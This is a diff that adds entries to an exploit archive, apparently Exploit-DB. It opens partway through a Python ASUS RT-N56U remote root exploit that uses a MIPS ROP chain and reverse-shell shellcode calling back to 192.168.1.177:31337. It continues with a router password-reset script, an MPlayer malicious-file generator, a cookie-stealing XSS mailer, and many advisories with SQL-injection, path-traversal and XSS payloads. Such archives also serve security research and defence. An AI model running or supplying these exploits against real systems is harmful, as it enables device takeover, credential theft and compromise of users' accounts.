            sleep(1)
 def basicAuth():
    auth = None
    while auth != "yes" and auth != "no":
        auth = raw_input("\n[*] Would you like to use HTTP Basic Authentication? \"yes\" or \"no\"\n>")
        if auth.lower() == "yes":
            print "\n\n[!!!] You chose to use HTTP Basic Authentication [!!!]\n"
            sleep(1)
            User, Pass = creds()
            return base64.encodestring("%s:%s" % (User, Pass)).replace("\n", "")
        elif auth.lower() == "no":
            print "\n\n[!!!] You chose not to use HTTP Basic Authentication. [!!!]\n"
            sleep(1)
            return 0
        else:
            print "\n\n[!!!] Error: You entered %s. Please enter \"yes\" or \"no\"! [!!!]\n" % auth
            sleep(1)
 def sigHandle(signum, frm): # Signal handler
    print "\n\n[!!!] Cleaning up the exploit... [!!!]\n"
    sleep(1)
    exit(0)
 def main():
    print """\n[*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
 [*] Discovered and Reported: October 2013
 [*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE 
 [*] Contact: Twitter - @rootHak42
 [*] Software Vendor: http://asus.com
 [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
 [*] Software: httpd (Listens on TCP/80 and TCP/443)
 [*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
 [*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343\n"""
    signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
    target = targURL()
    try:
        print "\n [*] Creating network socket"
        netSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        if target[0:5] == "https":
            host = target[8:]
            port = 443
            print " [*] Preparing SSL/TLS support."
            https_netSock = ssl.wrap_socket(netSock)
            finger = fingerPrint(host, port, https_netSock)
        else:
            host = target[7:]
            port = 80
            finger = fingerPrint(host, port, netSock)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    auth = basicAuth()
    junk = "\x42" * 109
    link_nop = "2Aa3"
    #Base address of ld_uClibc and libc in httpd address space
    ld_uClibcBase = 0x2aaa8000
    libcBaseAddr = 0x2ab5f000
    #Rop Chain
    #<chown+68>:   move    v0,s0 -> sched_yield()
    #<chown+72>:   lw  ra,28(sp) -> Rop2
    #<chown+76>:   lw  s0,24(sp)
    #<chown+80>:   jr  ra
    #<chown+84>:   addiu   sp,sp,32
    saved_ra1 = struct.pack("<L", libcBaseAddr + 0x73f4)
    #<_dl_runtime_pltresolve+68>:  lw  ra,36(sp) -> Rop 3
    #<_dl_runtime_pltresolve+72>:  lw  a0,16(sp)
    #<_dl_runtime_pltresolve+76>:  lw  a1,20(sp)
    #<_dl_runtime_pltresolve+80>:  lw  a2,24(sp)
    #<_dl_runtime_pltresolve+84>:  lw  a3,28(sp)
    #<_dl_runtime_pltresolve+88>:  addiu   sp,sp,40
    #<_dl_runtime_pltresolve+92>:  move    t9,v0
    #<_dl_runtime_pltresolve+96>:  jr  t9 -> jump sched_yield()
    #<_dl_runtime_pltresolve+100>: nop
    saved_ra2 = struct.pack("<L", ld_uClibcBase + 0x4e94)
    #<setrlimit64+144>:    addiu   a1,sp,24 -> ptr to stack
    #<setrlimit64+148>:    lw  gp,16(sp)
    #<setrlimit64+152>:    lw  ra,32(sp) -> Rop 4
    #<setrlimit64+156>:    jr  ra -> jump Rop 4
    #<setrlimit64+160>:    addiu   sp,sp,40
    saved_ra3 = struct.pack("<L", libcBaseAddr + 0x9ce0)
    #move    t9,a1 -> ptr to jalr sp on stack
    #addiu   a0,a0,56
    #jr      t9 -> jump to stack
    #move    a1,a2
    saved_ra4 = struct.pack("<L", libcBaseAddr + 0x308fc)
    #sched_yield()
    sch_yield_s0 = struct.pack("<L", libcBaseAddr + 0x94b0)
    #Stage 1 Shellcode 
    jalr_sp =  "\x09\xf8\xa0\x03"
    #Stage 2 Shellcode (Stack Pivot) by Jacob Holcomb of ISE
    stg2_SC = "\x2c\x08\xbd\x27"# addiu sp, sp, 2092
    stg2_SC += "\x09\xf8\xa0\x03"# jalr sp
    stg2_SC += "\x32\x41\x61"#filler for link (branch delay)
    #Stage 3 Shellcode
    #200 byte Linux MIPS reverse shell shellcode by Jacob Holcomb of ISE
    #Connects on 192.168.1.177:31337
    stg3_SC = "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
    stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += "\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
    stg3_SC += "\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
    stg3_SC += "\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
    stg3_SC += "\xf8\xff\xa5\xaf\x01\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
    stg3_SC += "\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
    stg3_SC += "\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
    stg3_SC += "\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
    stg3_SC += "\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
    stg3_SC += "\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
    stg3_SC += "\xab\x0f\x02\x24\x0c\x09\x09\x01"
    payload =  junk + sch_yield_s0 + junk[0:12] + saved_ra1 + junk[0:32]
    payload += saved_ra2 + junk[0:36] + saved_ra3 + junk[0:24] + jalr_sp
    payload += link_nop + saved_ra4 + junk[0:4] + stg2_SC
    postData = "apps_action=install&apps_path=&apps_name=%s&apps_flag=sdb1" % payload
    try:
        print "\n [*] Preparing the malicious web request."
        httpRequest = urllib2.Request("%s/APP_Installation.asp" % target, data = postData)
        httpRequest.add_header("Cookie", "hwaddr=" + junk[0:35] + stg3_SC + "\x42" * (265 - len(stg3_SC)))
        if auth != 0:
            httpRequest.add_header("Authorization", "Basic %s" % auth)
        print " [*] Successfully built HTTP POST request."
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    try:
        print """ [*] Preparing to send Evil PAYLoAd to %s on port %d!\n [*] Payload Length: %d
 [*] Waiting...""" % (host, port, len(payload))
        sploit = urllib2.urlopen(httpRequest, None, 6)
        if sploit.getcode() == 200:
            print " [*] Server Response: HTTP 200 OK. Get ready 2 catch roOt on TCP/31337!"
        else:
            print " [*] Server Response: HTTP %d. Something went wrong!" % sploit.getcode()
    except(urllib2.URLError) as error:
        print "\n [!!!] Web request error! %s %s [!!!]\n\n" % (type(error), error) 
        exit(0)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    finally:
        print " [*] %s exploit code has finished.\n" % finger
 if __name__ == "__main__":
 	main()	
--- a/platforms/hardware/webapps/31087.txt
+++ b/platforms/hardware/webapps/31087.txt
@ -0,0 +1,21 @@
 # Exploit Title: Teracom Modem Stored XSS Vulnerability
 # Date: 19-01-2014
 # Author: Rakesh S
 # Software Link: http://www.teracom.in/
 # Version:  T2-B-Gawv1.4U10Y-BI
 # Tested on: Windows 7
 # Code :
 GET /webconfig/wlan/country.html/country?context=&wlanprofile=MIXED_G_WIFI&wlanstatus=on&country=INI&txpower=5&wlanmultitouni=on&TxRate=Automatic&chanselect=automatic&channel=4&essid="><img src=x onerror=prompt(1);>%3E&hidessid=off&security=wpawpa2&authmethodselect=psk&wpapp=---&pmkcaching=off&confirm=Confirm HTTP/1.1
 Host: 192.168.1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip, deflate
 DNT: 1
 Proxy-Connection: keep-alive
 Referer: http://192.168.1.1/webconfig/wlan/country.html
 Cookie: httpTimeOut=None
 Authorization: Basic VGhpc2lzbm90Ok15b3JnaW5hbHBhc3N3b3Jk
 Attack details
 The variable Network Name (SSID): has been set to "><img src=x onerror=prompt(1);>
--- a/platforms/hardware/webapps/31088.py
+++ b/platforms/hardware/webapps/31088.py
@ -0,0 +1,59 @@
 # Exploit Title: BLUE COM Router - 5360/52018 Password Reset Exploit
 # Date: 20/1/2013
 # Exploit Author: KAI (kaisai12)
 # Home: CEH.VN
 # Version: BCOM - 5360
 # vulnerability - change password easy ! no protect !
 #var loc = 'password.cgi?';
 #switch ( idx ) {
 #         case 2:
 #            loc += 'sptPassword=' + encodeUrl(pwdNew.value);
 #            break;
 #         case 3:
 #            loc += 'usrPassword=' + encodeUrl(pwdNew.value);
 #            break;
 #         default:
 #            loc += 'sysPassword=' + encodeUrl(pwdNew.value);
 #            break;
 #      }
 #
 #      var code = 'location="' + loc + '"';
 #      eval(code);
 #   }
 #}
 import urllib
 import sys
 def attackrouter(ip,password):
    try:
        params = urllib.urlencode({'sysPassword': str(password)})
        f = urllib.urlopen("http://"+ip+"/password.cgi?%s" % params)
        print "[+] IP: %s - Reset password: %s" % (ip,password)
        return
    except:
        print "[-] error"
 def main():
    if len(sys.argv) > 2:
       ip = sys.argv[1]
       password = sys.argv[2]
       print "--------------------------------------------------"
       print "Router BCOM Exploit Execute Reset password modem  "
       print "                             author: KAI(CEH>VN)  "
       print "--------------------------------------------------"
       print "[+] Sending exploit: OK"
       attackrouter(ip,password)
    else:
        print "[-] Command error"
        print "[-] Use:bluecomRT.py <ip> <password>"
 if __name__ == '__main__':
     main()
--- a/platforms/linux/dos/30894.txt
+++ b/platforms/linux/dos/30894.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/26899/info
 PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
 Successfully exploiting these issues will allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
 These issues affect PeerCast 0.12.17, SVN 334 and prior versions.
 http://www.exploit-db.com/sploits/30894.zip
--- a/platforms/linux/dos/31018.txt
+++ b/platforms/linux/dos/31018.txt
@ -0,0 +1,12 @@
 source: http://www.securityfocus.com/bid/27249/info
 GStreamer is prone to multiple unspecified denial-of-service vulnerabilities when handling malformed media files.
 Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
 These issues affect GStreamer 0.10.15; other versions may also be vulnerable. 
 http://www.exploit-db.com/sploits/31018-1.mpg
 http://www.exploit-db.com/sploits/31018-2.mpg
 http://www.exploit-db.com/sploits/31018-3.m2v
 http://www.exploit-db.com/sploits/31018-4.m2v
--- a/platforms/linux/remote/30907.txt
+++ b/platforms/linux/remote/30907.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/26960/info
 The Adobe Flash Player ActiveX control is prone to a cross-domain scripting vulnerability.
 An attacker may leverage this issue to execute arbitrary JavaScript in the context of another domain.
 This issue affects Adobe Flash Player 9.0.48.0, 8.0.35.0, and prior versions.
 NOTE: This issue was previously disclosed in BID 26929 (Adobe Flash Player Multiple Security Vulnerabilities) but has been assigned its own BID because new technical details are available.
 http://www.exploit-db.com/sploits/30907.as
--- a/platforms/linux/remote/30971.txt
+++ b/platforms/linux/remote/30971.txt
@ -0,0 +1,12 @@
 source: http://www.securityfocus.com/bid/27103/info
 Georgia SoftWorks Secure Shell Server is prone to multiple remote code-execution vulnerabilities:
 - A format-string vulnerability
 - Two buffer-overflow vulnerabilities.
 Successfully exploiting these issues allows remote attackers to execute arbitrary machine code with SYSTEM-level privileges, facilitating the complete compromise of affected computers.
 Georgia SoftWorks Secure Shell Server 7.01.0003 is vulnerable to these issues; other versions may also be affected. 
 http://www.exploit-db.com/sploits/30971.zip
--- a/platforms/linux/remote/31076.py
+++ b/platforms/linux/remote/31076.py
@ -0,0 +1,59 @@
 source: http://www.securityfocus.com/bid/27499/info
 MPlayer is prone to a remote code-execution vulnerability because it fails to sanitize certain 'MOV' file tags before using them to index heap memory.
 An attacker can exploit this issue to execute arbitrary code, which can result in the complete compromise of the computer. Failed exploit attempts will result in a denial-of-service condition.
 This issue affects MPlayer 1.0rc2; other versions may also be affected. 
 #!/bin/python
 import struct
 import sys
 def mkatom(type,data):
     if len(type) != 4:
         raise "type must by of length 4!!!"
     mov = ""
     mov += struct.pack(">L",len(data)+8)
     mov += type
     mov += data
     return mov
 def poc(address, block_size):
     what=struct.pack(">L", 0x41414141) * 2 # Writes an 8 bytes chunk
     base= ((address - 8) / block_size) +1
     ftyp = mkatom("ftyp","3gp4"+"\x00\x00\x02\x00"+"3gp4"+"3gp33gp23gp1")
     mdat = mkatom("mdat","MALDAAAAAD!")
     stsc  = mkatom("stsc",struct.pack(">L",1) + \
                     struct.pack(">L",2) + \
                     struct.pack(">L",base) + \
                     what + \
                     struct.pack(">L",base+300)+what)
     trak = mkatom("trak",stsc)
     moov = mkatom("moov",trak)
     file = ftyp + mdat + moov
     return file
 try:
     if sys.argv[2] != "linux":
         evilness = poc(0x0122e000, 24)     #Windows XP SP2 Prof. ES
     else:
         evilness = poc(0x088aa020, 20)     #Linux Gentoo
     print "[+] Generating file: %s" % sys.argv[1]
     file = open(sys.argv[1], "wb")
     file.write(evilness)
     file.close()
     print "[+] Done."
 except Exception, e:
     print "[+] Usage: python mplayer_poc.py filename.mov windows (For
 WinXP Prof SP2 ES)"
     print "           python mplayer_poc.py filename.mov linux     (For
 Linux Gentoo)"
--- a/platforms/multiple/dos/30943.txt
+++ b/platforms/multiple/dos/30943.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27048/info
 Libnemesi is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
 Attackers can exploit these issues to execute arbitrary code in the context of applications that use the library. Failed attacks will cause denial-of-service conditions.
 Libnemesi 0.6.4-rc1 is vulnerable; other versions may also be affected. 
 http://www.exploit-db.com/sploits/30943.zip
--- a/platforms/multiple/dos/30989.txt
+++ b/platforms/multiple/dos/30989.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27141/info
 Pragma Systems FortressSSH is prone to a remote denial-of-service vulnerability because it fails to adequately handle certain exceptions when processing overly long user-supplied input.
 Attackers can exploit this issue to exhaust the maximum number of connections alotted for servers. Successful attacks will deny access to legitimate users.
 FortressSSH 5.0 is vulnerable; other versions may also be affected. 
 http://www.exploit-db.com/sploits/30989.zip
--- a/platforms/multiple/dos/30990.txt
+++ b/platforms/multiple/dos/30990.txt
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/27142/info
 Foxit WAC Server is prone to a denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
 An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
 This issue affects Foxit WAC Server 2.0 Build 3503 and prior versions. 
 http://www.exploit-db.com/sploits/30990-1.zip
 http://www.exploit-db.com/sploits/30990-2.zip
--- a/platforms/multiple/dos/30991.txt
+++ b/platforms/multiple/dos/30991.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27143/info
 Pragma TelnetServer is prone to a denial-of-service vulnerability because it fails to adequately handle certain telnet options.
 Attackers can leverage this issue to terminate the server and cause denial-of-service conditions.
 This issue affects Pragma TelnetServer 7.0 Build 4 Revision 589; other versions may also be vulnerable.
 http://www.exploit-db.com/sploits/30991.zip
--- a/platforms/multiple/dos/31100.txt
+++ b/platforms/multiple/dos/31100.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27593/info
 Anon Proxy Server is prone to a remote buffer-overflow vulnerability because the application fails to sufficiently bounds-check user-supplied input.
 Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application, facilitating the compromise of affected computers.
 Versions prior to Anon Proxy Server 0.103 are vulnerable to this issue. 
 print "A" x 430 . '"' x 29 . "A" x 40 . "\n" 
--- a/platforms/multiple/local/30970.txt
+++ b/platforms/multiple/local/30970.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27102/info
 White_Dune is affected by a format-string vulnerability and a buffer-overflow vulnerability.
 Exploiting these issues can allow local attackers to execute arbitrary code in the context of the application.
 Versions prior to White_Dune 0.29beta795 are affected. 
 http://www.exploit-db.com/sploits/30970.zip
--- a/platforms/multiple/remote/30944.txt
+++ b/platforms/multiple/remote/30944.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27049/info
 Feng is prone to multiple remote buffer-overflow and denial-of-service vulnerabilities.
 Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the server application. Attackers may also crash the application, denying service to legitimate users.
 Feng 0.1.15 is vulnerable to these issues; other versions may also be affected.
 http://www.exploit-db.com/sploits/30944.zip
--- a/platforms/novell/remote/31095.txt
+++ b/platforms/novell/remote/31095.txt
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/27582/info
 Novell GroupWise WebAccess is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 Exploiting these issues may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
 Novell GroupWise WebAccess 7 is vulnerable; other versions may also be affected. 
 http://www.example.com/servlet/webacc?Error=[XSS]
 http://www.example.com/servlet/webacc?User.html=[XSS] 
--- a/platforms/php/webapps/30877.txt
+++ b/platforms/php/webapps/30877.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/26800/info
 Roundcube Webmail is prone to an input-validation vulnerability because it fails to sanitize HTML email messages.
 Attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user. Successful attacks can allow attackers to steal cookie-based authentication credentials from legitimate users of the site; other attacks are also possible.
 Roundcube Webmail 0.1rc2 is vulnerable; other versions may also be affected.
 http://www.exploit-db.com/sploits/30877.eml
--- a/platforms/php/webapps/31074.txt
+++ b/platforms/php/webapps/31074.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27492/info
 Nucleus CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 The issue affects Nucleus CMS 3.31; other versions may also be vulnerable.
 http://www.example.com/[installdir]/action.php/"><script>alert('DSecRG XSS')</script> 
--- a/platforms/php/webapps/31075.txt
+++ b/platforms/php/webapps/31075.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27498/info
 AmpJuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 AmpJuke 0.7.0 is vulnerable; other versions may also be affected. 
 http://www.example.com/scriptpath/index.php?what=search&start=0&dir=ASC&sorttbl=track&order_by=track.name&limit=[Xss] 
--- a/platforms/php/webapps/31077.txt
+++ b/platforms/php/webapps/31077.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/27508/info
 The 'com_buslicense' component for Mambo/Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 http://www.example.com/index.php?option=com_buslicense&sectionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/* 
--- a/platforms/php/webapps/31079.txt
+++ b/platforms/php/webapps/31079.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27517/info
 webSPELL is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 webSPELL 4.01.02 is vulnerable; other versions may also be affected. 
 http://www.example.com/path/index.php?site=whoisonline&sort=">[xss code] 
--- a/platforms/php/webapps/31080.txt
+++ b/platforms/php/webapps/31080.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/27518/info
 YeSiL KoRiDoR Ziyaretçi Defteri is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
 http://www.example.com/defter/index.php?sayfa=[sqL inj. code here ..] 
--- a/platforms/php/webapps/31082.txt
+++ b/platforms/php/webapps/31082.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27547/info
 Liferay Enterprise Portal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 This issue affects Liferay Enterprise Portal 4.3.6.
 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)<<script>script>alert(&#039;XSS !!!&#039;)<</script>/script> 
--- a/platforms/php/webapps/31083.txt
+++ b/platforms/php/webapps/31083.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27559/info
 Nilson's Blogger is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
 An attacker can exploit this vulnerability using directory-traversal strings to include local files in the context of the webserver process. This may allow the attacker to obtain potentially sensitive information; other attacks are also possible.
 This issue affects Nilson's Blogger 0.11; other versions may also be vulnerable. 
 http://www.example.com/comments.php?thispost=../../../../../../../../../../etc/passwd 
--- a/platforms/php/webapps/31084.txt
+++ b/platforms/php/webapps/31084.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/27563/info
 Archimede Net 2000 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 http://www.example.com/telefonia/E-Guest_show.php?display=(sql) 
--- a/platforms/php/webapps/31085.txt
+++ b/platforms/php/webapps/31085.txt
@ -0,0 +1,26 @@
 # Exploit Title :  Doodle4Gift <= Multiple Vulnerabilities
 # Author        :  Dr.NaNo
 # Date          :  H-1435/3/18 - 2014/1/19
 # Software Link :  http://www.hotscripts.com/listing/doodle4gift/
 # Software Link2:  https://sites.google.com/site/doodle4gift/
 #
 #
 #            (1) Cross Site Scripting (XSS):
 #
 #
 #      http://localhost/{path}/index.php?action=showprofile&profile=(XSS)
 #
 #      http://localhost/{path}/index.php?action=showprofile&profile=<script>alert('Dr.nano')</script>
 #	 
 #	 
 #
 #            (2) information disclosure:
 #
 #
 #      http://localhost/{path}/data/doodle4gift.xml <= there are {Id,Password,Email} :)
 #
 #
 #
 #                  A special gift for: (P0c Team),(V4-Team):?????? ????? ??
 #
 #
--- a/platforms/php/webapps/31086.php
+++ b/platforms/php/webapps/31086.php
@ -0,0 +1,86 @@
 <?php
 /*  
 # Exploit Title  : AfterLogic Pro and Lite <= 7.1.1.1 Stored XSS
 # Google Dork	 : intext:"AfterLogic" intext:"Login Information" inurl:index.php
 # Date		 : 19 Jan 2014
 # Exploit Author : Saeed reza Zamanian  [s.zamanian [AT] imenantivirus.com]
 # Vendor Homepage: http://www.afterlogic.com/
 # Software Link  : http://www.afterlogic.com/download/webmail-pro
 # Version	 : <= 7.1.1.1
 # Tested on	 : KALI Linux 1.0.5 (Debian) Apache/2.2.22 
 # CVE 		 : vendor id = 6423
 Greetz:  H.Zamanian, K.Kia, K.Khani
 WebApp Desciption:
 	AfterLogic WebMail is a browser-based e-mail and collaboration front end,
 	designed to work with your existing messaging solutions. From an administrator’s
 	perspective, the application is easy to install on your own server, easy to integrate and
 	easy to maintain.
 Vulnerability Description:
 	XSS codes can be stored in E-Mail Body.
 	So you can send an email to the Victim with below payload and steal the victim's cookie.
 	<a href=javaScRipt:alert(document.cookie)>Click Me, Please...</a>\r\n
 	 NOTE: javascript html char encode = javaScRipt
 	then you will be able to get into the victim's mailbox via the url:
 	http://[WebSite]/[AfterLogic]/Default.aspx
 ## Phpmailer class is included in the exploit so you need to download it here and run the exploit in the phpmailer directory:
 	http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list
 */
 echo "<title>AfterLogic Pro and Lite <= 7.1.1.1 XSS Exploit</title>";
 require_once('class.phpmailer.php');
 $mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch
 $mail->IsSMTP(); // telling the class to use SMTP
 /* SETTINGS */
 $smtp_user = "username"; 	// Any valid smtp account
 $smtp_pass = "password";	// Your PASSWORD
 $smtp_port = "25";		// SMTP PORT Default: 25
 $smtp_host = "localhost"; 	// Any valid smtp server
 $from = "attacker@email.com";	// Any email
 $victim = "victim@email.com";	// Victim email on afterlogic webmail.
 $subject = "Salam";		// Subject
 /* Body Text */
 $body = '<a href=javaScRipt:alert(document.cookie)>Click Me, Please...</a>\r\n';
 try {
  $mail->SMTPDebug  = 2;                  // enables SMTP debug information (for testing)
  $mail->SMTPAuth   = false;               // enable SMTP authentication
  $mail->Host       = $smtp_host;
  $mail->Port       = $smtp_port;
  $mail->Username   = $smtp_user; 	 // SMTP account username
  $mail->Password   = $smtp_pass;        // SMTP account password
  $mail->SetFrom($from, 'Attacker');
  $mail->AddReplyTo($from, 'Attacker');
  $mail->AddAddress($victim, 'Victim');
  $mail->Subject = $subject;
  $mail->MsgHTML($body);
  $mail->Send();
  echo "Message Sent OK</p>\n";
 } catch (phpmailerException $e) {
  echo $e->errorMessage();
 } catch (Exception $e) {
  echo $e->getMessage();
 }
 ?>
 </body>
 </html>
--- a/platforms/php/webapps/31091.txt
+++ b/platforms/php/webapps/31091.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27571/info
 Domain Trader is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 Domain Trader 2.0 is vulnerable; prior versions may also be affected.
 http://www.example.com/script/catalog.php?mode=viewcategory&id=<script>alert(document.cookie)</script> 
--- a/platforms/php/webapps/31092.txt
+++ b/platforms/php/webapps/31092.txt
@ -0,0 +1,15 @@
 source: http://www.securityfocus.com/bid/27572/info
 WP-Footnotes plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. The plugin also insecurely exposes administrative functionality.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 This issue affects WP-Footnotes 2.2; other versions may also be vulnerable. 
 http://www.example.com/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[priority]="><script>alert("XSS")</script>
 http://www.example.com/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[style_rules]=&lt;/textarea&gt;<script>alert("XSS")</script>
 http://www.example.com/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[pre_footnotes]=&lt;/textarea&gt;<script>alert("XSS")</script>
 http://www.example.com/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[post_footnotes]=&lt;/textarea&gt;<script>alert(":-(")
--- a/platforms/php/webapps/31093.txt
+++ b/platforms/php/webapps/31093.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/27574/info
 iTechClassifieds is prone to an input-validation vulnerability that may be exploited as a cross-site scripting issue or an SQL-injection issue. This issue occurs because the application fails to adequately sanitize user-supplied input.
 A successful exploit may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
 http://www.example.com/ViewCat.php?CatID=[SQL] 
--- a/platforms/php/webapps/31094.txt
+++ b/platforms/php/webapps/31094.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/27574/info
 iTechClassifieds is prone to an input-validation vulnerability that may be exploited as a cross-site scripting issue or an SQL-injection issue. This issue occurs because the application fails to adequately sanitize user-supplied input.
 A successful exploit may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 http://www.example.com/ViewCat.php?CatID=[XSS]
--- a/platforms/php/webapps/31096.txt
+++ b/platforms/php/webapps/31096.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/27586/info
 The ShiftThis Newsletter plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
 http://www.example.com/wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users 
--- a/platforms/php/webapps/31097.txt
+++ b/platforms/php/webapps/31097.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27588/info
